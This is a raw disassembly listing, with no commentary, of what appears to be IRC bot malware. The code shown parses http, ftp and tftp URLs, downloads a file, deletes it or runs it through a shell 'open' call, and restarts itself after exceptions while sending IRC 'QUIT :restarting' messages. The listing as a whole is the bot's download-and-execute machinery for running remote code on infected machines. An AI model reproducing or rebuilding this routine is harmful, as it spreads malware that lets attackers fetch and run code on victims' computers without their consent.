var_7E4 = dword ptr -7E4h
var_7E0 = dword ptr -7E0h
var_7DC = byte ptr -7DCh
var_6D5 = byte ptr -6D5h
var_6D4 = byte ptr -6D4h
var_6CC = dword ptr -6CCh
var_6C8 = dword ptr -6C8h
var_6C4 = dword ptr -6C4h
var_6C0 = dword ptr -6C0h
var_6BC = byte ptr -6BCh
var_6BB = byte ptr -6BBh
var_63C = dword ptr -63Ch
var_638 = byte ptr -638h
var_637 = byte ptr -637h
var_632 = byte ptr -632h
var_631 = byte ptr -631h
var_534 = byte ptr -534h
var_430 = byte ptr -430h
var_2A8 = byte ptr -2A8h
var_2A7 = byte ptr -2A7h
var_2A6 = byte ptr -2A6h
var_2A3 = byte ptr -2A3h
var_296 = byte ptr -296h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = byte ptr -284h
var_283 = byte ptr -283h
var_204 = byte ptr -204h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 804h
push edi
push 3AFh
push [ebp+arg_0]
lea eax, [ebp+var_63C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_7DC]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
and [ebp+var_288], 0
mov [ebp+var_28C], 1
and [ebp+var_6CC], 0
mov al, byte_41DE00
mov [ebp+var_284], al
push 1Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_283]
rep stosd
stosw
stosb
mov al, byte_41DE00
mov [ebp+var_6BC], al
push 1Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_6BB]
rep stosd
stosw
stosb
and [ebp+var_6C8], 0
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_7DC]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_4185CC
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 14h
push 7
push offset dword_4185C4
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_402B93
push 0
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_631]
push eax
call dword_417060 ; CopyFileA
test eax, eax
jnz short loc_402B8E
call dword_417064 ; RtlGetLastWin32Error
cmp eax, 20h
jnz short loc_402B58
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41858C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_402B7B
; ---------------------------------------------------------------------------
loc_402B58: ; CODE XREF: sub_402A32+FF�j
lea eax, [ebp+var_631]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41855C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_402B7B: ; CODE XREF: sub_402A32+124�j
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402B8E: ; CODE XREF: sub_402A32+F4�j
jmp loc_403256
; ---------------------------------------------------------------------------
loc_402B93: ; CODE XREF: sub_402A32+D6�j
lea eax, [ebp+var_638]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_6C0], eax
jmp short loc_402BB5
; ---------------------------------------------------------------------------
loc_402BA8: ; CODE XREF: sub_402A32:loc_402CD8�j
mov eax, [ebp+var_6C0]
dec eax
mov [ebp+var_6C0], eax
loc_402BB5: ; CODE XREF: sub_402A32+174�j
cmp [ebp+var_6C0], 0FFFFFFFFh
jz loc_402CDD
mov eax, [ebp+var_6C0]
movsx eax, [ebp+eax+var_638]
cmp eax, 3Ah
jnz loc_402CD8
mov [ebp+var_7E0], 1
jmp short loc_402BF2
; ---------------------------------------------------------------------------
loc_402BE5: ; CODE XREF: sub_402A32:loc_402CD3�j
mov eax, [ebp+var_7E0]
inc eax
mov [ebp+var_7E0], eax
loc_402BF2: ; CODE XREF: sub_402A32+1B1�j
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
test eax, eax
jz short loc_402C23
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 2Fh
jnz short loc_402C7A
loc_402C23: ; CODE XREF: sub_402A32+1D6�j
mov eax, [ebp+var_7E0]
and [ebp+eax+var_6D5], 0
lea eax, [ebp+var_6D4]
push eax
call sub_40422A
pop ecx
test eax, eax
jz short loc_402C75
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_638]
add eax, [ebp+var_7E0]
push eax
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_638]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov [ebp+var_6C8], 1
loc_402C75: ; CODE XREF: sub_402A32+20E�j
jmp loc_403251
; ---------------------------------------------------------------------------
loc_402C7A: ; CODE XREF: sub_402A32+1EF�j
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 30h
jl short loc_402CCE
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 39h
jg short loc_402CCE
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
mov ecx, [ebp+var_7E0]
mov al, [ebp+eax+var_638]
mov [ebp+ecx+var_6D5], al
jmp short loc_402CD3
; ---------------------------------------------------------------------------
loc_402CCE: ; CODE XREF: sub_402A32+25F�j
; sub_402A32+278�j
jmp loc_40324C
; ---------------------------------------------------------------------------
loc_402CD3: ; CODE XREF: sub_402A32+29A�j
jmp loc_402BE5
; ---------------------------------------------------------------------------
loc_402CD8: ; CODE XREF: sub_402A32+1A1�j
jmp loc_402BA8
; ---------------------------------------------------------------------------
loc_402CDD: ; CODE XREF: sub_402A32+18A�j
; sub_402A32:loc_40324C�j ...
push 7
push offset aHttp ; "http://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402D37
cmp [ebp+var_6C8], 0
jnz short loc_402D13
push offset a80 ; "80"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_402D13: ; CODE XREF: sub_402A32+2CC�j
lea eax, [ebp+var_631]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov [ebp+var_6CC], 1
jmp loc_402E3D
; ---------------------------------------------------------------------------
loc_402D37: ; CODE XREF: sub_402A32+2C3�j
push 6
push offset aFtp ; "ftp://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402DB7
cmp [ebp+var_6C8], 0
jnz short loc_402D6D
push offset a21 ; "21"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_402D6D: ; CODE XREF: sub_402A32+326�j
lea eax, [ebp+var_632]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov [ebp+var_6CC], 2
push offset aAnonymous ; "anonymous"
lea eax, [ebp+var_284]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset aAnonymous ; "anonymous"
lea eax, [ebp+var_6BC]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp loc_402E3D
; ---------------------------------------------------------------------------
loc_402DB7: ; CODE XREF: sub_402A32+31D�j
push 7
push offset aTftp ; "tftp://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402E0E
cmp [ebp+var_6C8], 0
jnz short loc_402DED
push offset a69 ; "69"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_402DED: ; CODE XREF: sub_402A32+3A6�j
lea eax, [ebp+var_631]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov [ebp+var_6CC], 3
jmp short loc_402E3D
; ---------------------------------------------------------------------------
loc_402E0E: ; CODE XREF: sub_402A32+39D�j
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset unk_418500
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402E3D: ; CODE XREF: sub_402A32+300�j
; sub_402A32+380�j ...
lea eax, [ebp+var_638]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_6C0], eax
jmp short loc_402E5F
; ---------------------------------------------------------------------------
loc_402E52: ; CODE XREF: sub_402A32:loc_402F11�j
mov eax, [ebp+var_6C0]
dec eax
mov [ebp+var_6C0], eax
loc_402E5F: ; CODE XREF: sub_402A32+41E�j
cmp [ebp+var_6C0], 0FFFFFFFFh
jz loc_402F16
mov eax, [ebp+var_6C0]
movsx eax, [ebp+eax+var_638]
cmp eax, 40h
jnz loc_402F11
mov eax, [ebp+var_6C0]
and [ebp+eax+var_638], 0
push offset asc_4184FC ; ":"
lea eax, [ebp+var_638]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_7E4], eax
cmp [ebp+var_7E4], 0
jz short loc_402ED8
mov eax, [ebp+var_7E4]
and byte ptr [eax], 0
push 80h
mov eax, [ebp+var_7E4]
inc eax
push eax
lea eax, [ebp+var_6BC]
push eax
call sub_407A56
add esp, 0Ch
loc_402ED8: ; CODE XREF: sub_402A32+47F�j
push 80h
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_284]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_637]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_402F16
; ---------------------------------------------------------------------------
loc_402F11: ; CODE XREF: sub_402A32+44B�j
jmp loc_402E52
; ---------------------------------------------------------------------------
loc_402F16: ; CODE XREF: sub_402A32+434�j
; sub_402A32+4DD�j
push offset asc_4184F8 ; "/"
lea eax, [ebp+var_638]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_288], eax
cmp [ebp+var_288], 0
jnz short loc_402F67
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset unk_4184CC
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402F67: ; CODE XREF: sub_402A32+504�j
mov eax, [ebp+var_288]
inc eax
push eax
lea eax, [ebp+var_204]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_288]
and byte ptr [eax], 0
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_100]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
call sub_416B64 ; clock
mov [ebp-6D8h], eax
and [ebp+var_6C4], 0
cmp [ebp+var_6CC], 1
jnz short loc_403009
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_6BC]
push eax
lea eax, [ebp+var_284]
push eax
call sub_402698
add esp, 24h
mov [ebp+var_28C], eax
loc_403009: ; CODE XREF: sub_402A32+582�j
cmp [ebp+var_6CC], 2
jnz short loc_403065
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_6BC]
push eax
lea eax, [ebp+var_284]
push eax
call sub_402A24
add esp, 24h
mov [ebp+var_28C], eax
loc_403065: ; CODE XREF: sub_402A32+5DE�j
cmp [ebp+var_6CC], 3
jnz short loc_4030B3
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
call sub_402A2B
add esp, 1Ch
mov [ebp+var_28C], eax
loc_4030B3: ; CODE XREF: sub_402A32+63A�j
; sub_402A32:loc_403256�j
cmp [ebp+var_28C], 1
jnz loc_403219
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_4030D7
mov [ebp+var_7EC], offset dword_4184C0
jmp short loc_403104
; ---------------------------------------------------------------------------
loc_4030D7: ; CODE XREF: sub_402A32+697�j
movsx eax, [ebp+var_2A6]
test eax, eax
jz short loc_4030EE
mov [ebp+var_7F0], offset dword_4184B4
jmp short loc_4030F8
; ---------------------------------------------------------------------------
loc_4030EE: ; CODE XREF: sub_402A32+6AE�j
mov [ebp+var_7F0], offset byte_41DE00
loc_4030F8: ; CODE XREF: sub_402A32+6BA�j
mov eax, [ebp+var_7F0]
mov [ebp+var_7EC], eax
loc_403104: ; CODE XREF: sub_402A32+6A3�j
push [ebp+var_7EC]
mov eax, [ebp+var_6C4]
shr eax, 0Ah
mov dword ptr [ebp+var_7F8], eax
and dword ptr [ebp+var_7F8+4], 0
fild [ebp+var_7F8]
fstp [ebp+var_7FC]
call sub_416B64 ; clock
sub eax, [ebp-6D8h]
mov dword ptr [ebp+var_804], eax
and dword ptr [ebp+var_804+4], 0
fild [ebp+var_804]
fdiv flt_417270
fdivr [ebp+var_7FC]
push ecx
push ecx
fstp [esp+814h+var_814]
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41846C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 1Ch
movsx eax, [ebp+var_2A7]
test eax, eax
jz short loc_403198
lea eax, [ebp+var_534]
push eax
call dword_4170AC ; DeleteFileA
jmp short loc_403217
; ---------------------------------------------------------------------------
loc_403198: ; CODE XREF: sub_402A32+755�j
movsx eax, [ebp+var_2A6]
test eax, eax
jnz short loc_4031AE
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_403217
loc_4031AE: ; CODE XREF: sub_402A32+76F�j
movsx eax, [ebp+var_2A3]
neg eax
sbb eax, eax
inc eax
push eax
push 0
push 0
lea eax, [ebp+var_534]
push eax
push offset aOpen ; "open"
push 0
call dword_4171D0
mov [ebp+var_7E8], eax
cmp [ebp+var_7E8], 20h
jbe short loc_4031F4
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_4031F2
call sub_407148
loc_4031F2: ; CODE XREF: sub_402A32+7B9�j
jmp short loc_403217
; ---------------------------------------------------------------------------
loc_4031F4: ; CODE XREF: sub_402A32+7AE�j
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_418444
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_403217: ; CODE XREF: sub_402A32+764�j
; sub_402A32+77A�j ...
jmp short loc_40323C
; ---------------------------------------------------------------------------
loc_403219: ; CODE XREF: sub_402A32+688�j
lea eax, [ebp+var_7DC]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_418414
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_40323C: ; CODE XREF: sub_402A32:loc_403217�j
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_40325B
; ---------------------------------------------------------------------------
loc_40324C: ; CODE XREF: sub_402A32:loc_402CCE�j
jmp loc_402CDD
; ---------------------------------------------------------------------------
loc_403251: ; CODE XREF: sub_402A32:loc_402C75�j
jmp loc_402CDD
; ---------------------------------------------------------------------------
loc_403256: ; CODE XREF: sub_402A32:loc_402B8E�j
jmp loc_4030B3
; ---------------------------------------------------------------------------
loc_40325B: ; CODE XREF: sub_402A32+157�j
; sub_402A32+406�j ...
pop edi
leave
retn 4
sub_402A32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403260 proc near ; CODE XREF: sub_40A9CF+959�p
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
cmp [ebp+arg_4], 0
jnz short loc_403271
jmp locret_403329
; ---------------------------------------------------------------------------
loc_403271: ; CODE XREF: sub_403260+A�j
push 3AFh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_40328A
jmp locret_403329
; ---------------------------------------------------------------------------
loc_40328A: ; CODE XREF: sub_403260+23�j
push 8
push 7Ah
push 61h
push 4
lea eax, [ebp+var_10]
push eax
call sub_410501
add esp, 14h
and [ebp+eax+var_10], 0
push offset dword_418620
lea eax, [ebp+var_10]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jnz short loc_4032BF
lea eax, [ebp+var_10]
mov [ebp+arg_8], eax
loc_4032BF: ; CODE XREF: sub_403260+57�j
push 104h
push [ebp+arg_4]
mov eax, [ebp+var_14]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_14]
add eax, 108h
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_14]
add eax, 20Ch
push eax
call sub_405F67
pop ecx
pop ecx
mov eax, [ebp+var_14]
add eax, 108h
push eax
mov eax, [ebp+var_14]
add eax, 4
push eax
push offset dword_4185FC
push 0
push [ebp+var_14]
push offset sub_402A32
call sub_4095A4
add esp, 18h
locret_403329: ; CODE XREF: sub_403260+C�j
; sub_403260+25�j
leave
retn
sub_403260 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40332B proc near ; CODE XREF: sub_4093B6+A0�p
; sub_4094E6+9B�p ...
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 114h
push 1
push offset dword_41DE0C
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp dword_41DE08, 0
jz loc_4034D9
mov [ebp+var_8], offset aException_othe ; "EXCEPTION_OTHER"
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_110], eax
cmp [ebp+var_110], 0C0000025h
ja short loc_4033A4
cmp [ebp+var_110], 0C0000025h
jz short loc_4033FA
cmp [ebp+var_110], 80000003h
jz short loc_4033DF
cmp [ebp+var_110], 0C0000005h
jz short loc_4033D6
cmp [ebp+var_110], 0C000001Dh
jz short loc_4033E8
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033A4: ; CODE XREF: sub_40332B+45�j
cmp [ebp+var_110], 0C000008Dh
jb short loc_403413
cmp [ebp+var_110], 0C0000093h
jbe short loc_40340C
cmp [ebp+var_110], 0C0000094h
jz short loc_4033F1
cmp [ebp+var_110], 0C00000FDh
jz short loc_403403
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033D6: ; CODE XREF: sub_40332B+69�j
mov [ebp+var_8], offset aException_acce ; "EXCEPTION_ACCESS_VIOLATION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033DF: ; CODE XREF: sub_40332B+5D�j
mov [ebp+var_8], offset aException_brea ; "EXCEPTION_BREAKPOINT"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033E8: ; CODE XREF: sub_40332B+75�j
mov [ebp+var_8], offset aException_ille ; "EXCEPTION_ILLEGAL_INSTRUCTION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033F1: ; CODE XREF: sub_40332B+9B�j
mov [ebp+var_8], offset aException_int_ ; "EXCEPTION_INT_DIVIDE_BY_ZERO"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033FA: ; CODE XREF: sub_40332B+51�j
mov [ebp+var_8], offset aException_nonc ; "EXCEPTION_NONCONTINUABLE_EXCEPTION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_403403: ; CODE XREF: sub_40332B+A7�j
mov [ebp+var_8], offset aException_stac ; "EXCEPTION_STACK_OVERFLOW"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_40340C: ; CODE XREF: sub_40332B+8F�j
mov [ebp+var_8], offset aException_flt ; "EXCEPTION_FLT"
loc_403413: ; CODE XREF: sub_40332B+77�j
; sub_40332B+83�j ...
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax+4], 1
jnz short loc_40342A
mov [ebp+var_114], offset aRestarting ; "Restarting"
jmp short loc_403434
; ---------------------------------------------------------------------------
loc_40342A: ; CODE XREF: sub_40332B+F1�j
mov [ebp+var_114], offset aContinuing ; "Continuing"
loc_403434: ; CODE XREF: sub_40332B+FD�j
push [ebp+var_114]
push [ebp+var_8]
mov eax, [ebp+arg_0]
mov eax, [eax]
push dword ptr [eax]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C0h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+9Ch]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A0h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0ACh]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B0h]
mov eax, [ebp+var_4]
inc eax
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push offset dword_41864C
push offset dword_41DA80
call sub_40D4AB
add esp, 48h
loc_4034D9: ; CODE XREF: sub_40332B+21�j
mov eax, [ebp+var_4]
inc eax
cmp eax, 64h
jz short loc_4034ED
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax+4], 1
jnz short loc_403558
loc_4034ED: ; CODE XREF: sub_40332B+1B5�j
push 104h
lea eax, [ebp+var_10C]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
test eax, eax
jz short loc_403545
push 0
push 0
push 0
lea eax, [ebp+var_10C]
push eax
push offset aOpen ; "open"
push 0
call dword_4171D0
cmp eax, 20h
ja short loc_403538
push offset aQuitExitting ; "QUIT :exitting"
call sub_40D6CB
pop ecx
jmp short loc_403543
; ---------------------------------------------------------------------------
loc_403538: ; CODE XREF: sub_40332B+1FE�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
loc_403543: ; CODE XREF: sub_40332B+20B�j
jmp short loc_403550
; ---------------------------------------------------------------------------
loc_403545: ; CODE XREF: sub_40332B+1DF�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
loc_403550: ; CODE XREF: sub_40332B:loc_403543�j
push 0
call dword_41705C ; ExitProcess
loc_403558: ; CODE XREF: sub_40332B+1C0�j
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 80000003h
jnz short loc_403583
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov eax, [eax+0B8h]
inc eax
mov ecx, [ebp+arg_0]
mov ecx, [ecx+4]
mov [ecx+0B8h], eax
or eax, 0FFFFFFFFh
jmp short locret_403586
; ---------------------------------------------------------------------------
loc_403583: ; CODE XREF: sub_40332B+238�j
push 1
pop eax
locret_403586: ; CODE XREF: sub_40332B+256�j
leave
retn
sub_40332B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403588 proc near ; DATA XREF: sub_403BD3:loc_403D85�o
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 48h
cmp [ebp+arg_8], 0
jz short loc_4035E2
mov eax, [ebp+arg_8]
cmp dword ptr [eax+4], 0
jz short loc_4035BB
mov eax, [ebp+arg_8]
cmp dword ptr [eax+4], 2
jz short loc_4035BB
push 273Fh
call dword_417234 ; WSASetLastError
mov eax, 273Fh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4035BB: ; CODE XREF: sub_403588+13�j
; sub_403588+1C�j
mov eax, [ebp+arg_8]
cmp dword ptr [eax+8], 1
jz short loc_4035E2
mov eax, [ebp+arg_8]
cmp dword ptr [eax+8], 2
jz short loc_4035E2
push 273Ch
call dword_417234 ; WSASetLastError
mov eax, 273Ch
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4035E2: ; CODE XREF: sub_403588+A�j
; sub_403588+3A�j ...
cmp [ebp+arg_0], 0
jnz loc_4036D6
push 30h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jnz short loc_40360D
push 8
call dword_417234 ; WSASetLastError
push 8
pop eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_40360D: ; CODE XREF: sub_403588+73�j
push 30h
push 0
push [ebp+var_34]
call sub_416B6A ; memset
add esp, 0Ch
push 10h
push 0
lea eax, [ebp+var_30]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_30], 2
cmp [ebp+arg_4], 0
jz short loc_40364C
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
push eax
call dword_417238 ; htons
mov [ebp+var_2E], ax
loc_40364C: ; CODE XREF: sub_403588+AE�j
mov eax, [ebp+var_34]
mov dword ptr [eax+4], 2
cmp [ebp+arg_8], 0
jz short loc_403667
mov eax, [ebp+arg_8]
mov eax, [eax+8]
mov [ebp+var_38], eax
jmp short loc_40366E
; ---------------------------------------------------------------------------
loc_403667: ; CODE XREF: sub_403588+D2�j
mov [ebp+var_38], 1
loc_40366E: ; CODE XREF: sub_403588+DD�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_38]
mov [eax+8], ecx
cmp [ebp+arg_8], 0
jz short loc_403688
mov eax, [ebp+arg_8]
mov eax, [eax+0Ch]
mov [ebp+var_3C], eax
jmp short loc_40368F
; ---------------------------------------------------------------------------
loc_403688: ; CODE XREF: sub_403588+F3�j
mov [ebp+var_3C], 6
loc_40368F: ; CODE XREF: sub_403588+FE�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_3C]
mov [eax+0Ch], ecx
mov eax, [ebp+var_34]
mov dword ptr [eax+10h], 10h
mov eax, [ebp+var_34]
add eax, 20h
mov ecx, [ebp+var_34]
mov [ecx+18h], eax
and [ebp+var_2C], 0
push 10h
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+var_34]
add eax, 20h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_34]
mov [eax], ecx
xor eax, eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4036D6: ; CODE XREF: sub_403588+5E�j
push [ebp+arg_0]
call dword_41723C ; gethostbyname
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4036F2
mov eax, 2AFBh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4036F2: ; CODE XREF: sub_403588+15E�j
and [ebp+var_20], 0
jmp short loc_4036FF
; ---------------------------------------------------------------------------
loc_4036F8: ; CODE XREF: sub_403588+18C�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_4036FF: ; CODE XREF: sub_403588+16E�j
cmp [ebp+var_14], 0
jz short loc_403716
mov eax, [ebp+var_14]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_20]
cmp dword ptr [eax+ecx*4], 0
jz short loc_403716
jmp short loc_4036F8
; ---------------------------------------------------------------------------
loc_403716: ; CODE XREF: sub_403588+17B�j
; sub_403588+18A�j
cmp [ebp+var_20], 0
jnz short loc_403726
mov eax, 2AFBh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_403726: ; CODE XREF: sub_403588+192�j
mov eax, [ebp+var_20]
imul eax, 30h
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_40374C
push 8
call dword_417234 ; WSASetLastError
push 8
pop eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_40374C: ; CODE XREF: sub_403588+1B2�j
mov eax, [ebp+var_20]
imul eax, 30h
push eax
push 0
push [ebp+var_1C]
call sub_416B6A ; memset
add esp, 0Ch
push 10h
push 0
lea eax, [ebp+var_10]
push eax
call sub_416B6A ; memset
add esp, 0Ch
